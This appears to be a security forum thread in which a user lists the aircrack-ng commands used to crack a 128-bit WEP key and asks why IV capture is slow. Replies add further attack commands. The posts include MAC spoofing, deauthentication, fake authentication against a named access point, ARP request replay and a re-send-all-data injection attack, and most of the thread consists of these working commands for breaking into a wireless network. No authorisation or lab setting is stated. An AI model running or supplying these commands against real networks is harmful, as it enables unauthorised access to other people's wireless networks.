Results 1 to 5 of 5

Thread: slow data collection on 128bit wep cracking.

  1. #1
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    8

    Default slow data collection on 128bit wep cracking.

    I will start with my commands

    airmon-ng
    airmon-ng stop (NIC)
    ifconfig (NIC) down
    macchanger -m 00:11:22:33:44:55 (NIC)
    airmon-ng start (NIC)
    airodump-ng (NIC)
    airodump-ng -c (channel mine is on is 8) -w (filename) --bssid (xx:xx...)(NIC)
    new window
    aireplay-ng -0 10 -a (bssid) -c (client mac)(NIC)
    new window
    aireplay-ng -3 -b (Bssid) -h (spoofed mac) (NIC)

    Everywhere i have seen from the video tutorials and such is that the IVs come a little faster than mine. I had my config go for 2h 45min and only got 9k IVs, not nearly enough to even try to crack yet. Just wondering if this is normal or if there is somthing wrong with my configs.

    also the aircrack command i use is aircrack-ng (filename)

    any help will be greatly appreciated
    Thanks

  2. #2
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    17

    Default

    Quote Originally Posted by squeek67 View Post
    I will start with my commands

    airmon-ng
    airmon-ng stop (NIC)
    ifconfig (NIC) down
    macchanger -m 00:11:22:33:44:55 (NIC)
    airmon-ng start (NIC)
    airodump-ng (NIC)
    airodump-ng -c (channel mine is on is 8) -w (filename) --bssid (xx:xx...)(NIC)
    new window
    aireplay-ng -0 10 -a (bssid) -c (client mac)(NIC)
    new window
    aireplay-ng -3 -b (Bssid) -h (spoofed mac) (NIC)

    Everywhere i have seen from the video tutorials and such is that the IVs come a little faster than mine. I had my config go for 2h 45min and only got 9k IVs, not nearly enough to even try to crack yet. Just wondering if this is normal or if there is somthing wrong with my configs.

    also the aircrack command i use is aircrack-ng (filename)

    any help will be greatly appreciated
    Thanks
    You need to capture an ARP Request and replay it to force the Access Point to pump out more IV's

    try this command aireplay-ng -3 -b BSSID of the access point -h and then a fake or a spoofed mac address followed by you network interface

    I am guessing you already fake authorized with the AP? if not you have to send out packets asking to authorize to the access point as a client.

    example command:

    aireplay-ng -1 0 -e belkin54g -a (BSSID of the ap) -h (fake mac address) then your network interface

    if that doesnt work you can always do interactive packet replay to create your own packets

    Also another useful attack you might try is the re-send all data attack, basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore giving you a new IV).

    aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0

  3. #3
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    How far away from the AP are you?
    Tiocfaidh ár lá

  4. #4
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    8

    Default

    about 10' away.

  5. #5
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Maybe you could tell us your machine specs and the type of adapter you are using.
    Tiocfaidh ár lá

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •